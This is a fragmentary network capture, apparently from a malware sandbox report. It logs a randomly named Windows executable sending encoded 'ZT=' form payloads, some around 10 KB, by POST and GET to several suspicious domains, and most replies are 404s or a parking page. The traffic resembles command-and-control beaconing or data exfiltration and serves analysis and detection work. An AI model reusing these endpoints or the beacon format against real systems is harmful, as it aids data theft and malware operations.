                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.091210.xyz
                                                                                                                                                                              Referer: http://www.091210.xyz/jwed/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:12:03.452763081 CET | 1033 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:03 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BIep7RoKluhaXx9zrtMoL1J8SZJi0wHdCaYMe2LCN5%2FfySoQnREHGHdGqG9AZMv9Z2IBmhm3zDIRqIVeAVIF6%2Fqh3pzvb8WX4viL6YIO0acjihyFtOdJ08Iyr8elpocQdQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8da9984479884784-DFW
                                                                                                                                                                              Content-Encoding: gzip
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1932&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10806&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.4 | 50031 | 172.67.154.67 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:12:05.394185066 CET | 443 | OUT | GET /jwed/?ZT=BP+RnxL4kRmCbJis2H94uci3abF0xOX/uWRdW7IS0nQn3eBqrLGhokpRAgB0njlljCrnZN3jlOJi4UAaeIXlep/T+OgRPR3ifAipJWCHkORcjZ0KtUFfU2c=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.091210.xyz
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
Oct 30, 2024 08:12:06.046822071 CET | 1029 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:05 GMT
                                                                                                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xinIiWNRIcHwM5X8ZP5mjpq%2BfM1UOr8lkUaDr6egOXumJ72RaajFtJcZbT5MNV7e7IpoWi1SixLr9K5fdes9AIZucXajbfrI1Cg%2B5kmWwfisbIVDwpxydofQgskZL9XrYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8da99854ddcd3ab5-DFW
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1112&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=443&delivery_rate=0&cwnd=30&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                                                              Data Ascii: 104<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.091210.xyz Port 80</address></body></html>
Oct 30, 2024 08:12:06.046880960 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.4 | 50032 | 20.2.249.7 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
Timestamp | Bytes transferred | Direction | Data
Oct 30, 2024 08:12:14.255358934 CET | 704 | OUT | POST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=xWPgQXPrdoR2/jHA/GGHRE034SNGg0NF9iAsDwl4tEoxFgo41F3VsUBClNzhOCwOh4OsPd9+dwQDAcimAwJI/86WRWA8AR6EEBSMDNJ/UFSImZYZbqa4zlhtD0B+ibcK9pjFAxcXmq8XUw1w3F6QOEio3tKG6jg6oZ1CMAgq9rYiwGR5xZSW+WSPOA8Oy1FN6g==
                                                                                                                                                                              Oct 30, 2024 08:12:15.186750889 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:15 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              26 | 192.168.2.4 | 50033 | 20.2.249.7 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:16.808760881 CET | 724 | OUT | POST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=xWPgQXPrdoR2+D3AzHGHGU043yNGpUNZ9iMsD1cls3AxFBY4nQDV5UBC99zgAiwRh4DTPYd+dwEDAdSmAH1LwM6UZ2A6ER6EEBSMDNNRUFKI66QZbLa/tVhuTEB+1LcO9pjdAwA9mv4XUwlw3U6fX0iu9NLx+y80mrMqHRc/j5BC1AcjgozBsW28TH16/24EhiOH/Mf7Lxo1UOKp3dk+9w4=
                                                                                                                                                                              Oct 30, 2024 08:12:17.752625942 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:17 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              27 | 192.168.2.4 | 50034 | 20.2.249.7 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:19.359023094 CET | 10806 | OUT | POST /wr26/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.adsa6c.top
                                                                                                                                                                              Referer: http://www.adsa6c.top/wr26/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:20.298212051 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:20 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              28 | 192.168.2.4 | 50035 | 20.2.249.7 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:21.897102118 CET | 443 | OUT | GET /wr26/?ZT=8UnATjvfTpQ77jvixFCgWVUX2yh4jGZbjC17bXoElnpRCxInjgnE/2IqsqXHODoNl6OiDfBQBXM7D7XvNANc8/XGVjRwEyGKTULZaqlRQkXooaUfX5GSz0A=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.adsa6c.top
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:22.831274033 CET | 289 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Server: nginx
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:22 GMT
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Content-Length: 146
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              29 | 192.168.2.4 | 50036 | 203.161.49.193 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:29.604518890 CET | 707 | OUT | POST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=4HgsinFGTOn6eDIgkDeW2VgudT7PfoumY1YRdqtsnA/C/qK/cFV5OUqh2PvtZr3gn/9LNd/LQUYF5HTcYEKMHYpWD9Y7r5WzIsgV6awqEW8yOWtsYFvNzeBjByzgAo4qjRGn1Qp+P1mIy+Cpsf6NOpo4fAkWrFSfptCp+/GIDmXxa5q8E/g2CR8D9+D7bHmJvw==
                                                                                                                                                                              Oct 30, 2024 08:12:30.271007061 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:30 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              30 | 192.168.2.4 | 50037 | 203.161.49.193 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:32.151196957 CET | 727 | OUT | POST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=4HgsinFGTOn6MyYgmkyWjFgpDj7PWIuiY1kRdr587lPC/K6/dEV5PUqh+vunE737n/xtNcDLQUMF5GjcZ1KLIopULdY10JWzIsgV6ZMMEXUyPmdsXEvCweBiWCzgR45CjRGg1RlYPwiIy/ypsO6MBpo+SglSo3LSmpb87PO1MmPqWfnmVOBhQRYwg5KPWEbA0x/8Jt96C21zQks8K6Iq/E0=
                                                                                                                                                                              Oct 30, 2024 08:12:32.829319000 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:32 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              31 | 192.168.2.4 | 50038 | 203.161.49.193 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:34.700097084 CET | 10809 | OUT | POST /ep69/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 10299
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.simplek.top
                                                                                                                                                                              Referer: http://www.simplek.top/ep69/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:35.379117012 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:35 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              32 | 192.168.2.4 | 50039 | 203.161.49.193 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:37.241488934 CET | 444 | OUT | GET /ep69/?ZT=1FIMhSJhU8+lHAAmrS+FlWYlLXz7aIiZYVZCfaZw4D7e7Ym+VFULEmTMy/HAB+T+rsRxHszMTzww+hC5XQWyLoZ+L/5l/vKoQeg/i8EmIWt3MnVCcXzM6O0=&mTkD=Gj2Ti2T0g4 HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.simplek.top
                                                                                                                                                                              Connection: close
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Oct 30, 2024 08:12:37.918967009 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                              Date: Wed, 30 Oct 2024 07:12:37 GMT
                                                                                                                                                                              Server: Apache
                                                                                                                                                                              Content-Length: 389
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              33 | 192.168.2.4 | 50040 | 199.59.243.227 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:43.183733940 CET | 704 | OUT | POST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 199
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=LTHcjhwtSaHetbtN3OB5ybhpGB/1fsxEFzk+Wfkqqb3u9L7NbsMsRu4z4hur9Y3OCCwGapemyByRI0viphWh9Fw7lXgMcn1PR2Ux23v/z+1I/IU1Aoo14RGTe5x+iwEsP+ffOggXsjSjMMJcOVAMCaMJRYFJTu9HiPsJnC4v7cx4PbOlhE8vk1LaGTdjmaWcuw==
                                                                                                                                                                              Oct 30, 2024 08:12:43.809514999 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:12:42 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: 45b93edb-4621-4eb4-8517-45424482cbe1
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=45b93edb-4621-4eb4-8517-45424482cbe1; expires=Wed, 30 Oct 2024 07:27:43 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 30, 2024 08:12:43.809561968 CET | 563 | IN |
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNDViOTNlZGItNDYyMS00ZWI0LTg1MTctNDU0MjQ0ODJjYmUxIiwicGFnZV90aW1lIjoxNzMwMjcyMz


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              34 | 192.168.2.4 | 50041 | 199.59.243.227 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:45.732055902 CET | 724 | OUT | POST /xyex/ HTTP/1.1
                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                              Accept-Language: en-US,en;q=0.5
                                                                                                                                                                              Host: www.297676.com
                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              Content-Length: 219
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Origin: http://www.297676.com
                                                                                                                                                                              Referer: http://www.297676.com/xyex/
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; Touch; TNJB; rv:11.0) like Gecko
                                                                                                                                                                              Data Ascii: ZT=LTHcjhwtSaHe8L9N1vB56bhqKh/1RMxfFzg+WdI6rpTu6pjNatMsEu4zgRuugo3FCDNzaoimyBmRI0fipy+g9Vw5t3gCTH1PR2Ux23TRz/dI/5k1G9c21xGcZ5x+mwEoP+fxOh89shajMJlcOAsPJaM1OoE9TtANttFanzY20+IeD9D/w1d421vpbUUXrZrV18zQVF5xkiQTxBNR+f256d8=
                                                                                                                                                                              Oct 30, 2024 08:12:46.357311010 CET | 1236 | IN | HTTP/1.1 200 OK
                                                                                                                                                                              date: Wed, 30 Oct 2024 07:12:46 GMT
                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                              content-length: 1110
                                                                                                                                                                              x-request-id: f26329f9-1af9-4058-b154-17022d833e72
                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==
                                                                                                                                                                              set-cookie: parking_session=f26329f9-1af9-4058-b154-17022d833e72; expires=Wed, 30 Oct 2024 07:27:46 GMT; path=/
                                                                                                                                                                              connection: close
                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_VvMkd70pcaa++xPHPET7k8HS9oPvuvUA+ckFU+grDEVs81sT6IXsqQaYMUjfPOmNLH9DqeVG1jduG9TKC3NhDw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                                                                                                                                              Oct 30, 2024 08:12:46.357333899 CET | 563 | IN
                                                                                                                                                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZjI2MzI5ZjktMWFmOS00MDU4LWIxNTQtMTcwMjJkODMzZTcyIiwicGFnZV90aW1lIjoxNzMwMjcyMz


                                                                                                                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                              35 | 192.168.2.4 | 50042 | 199.59.243.227 | 80 | 3804 | C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe
                                                                                                                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                              Oct 30, 2024 08:12:48.280092001 CET | 10806 | OUT | POST /xyex/ HTTP/1.1
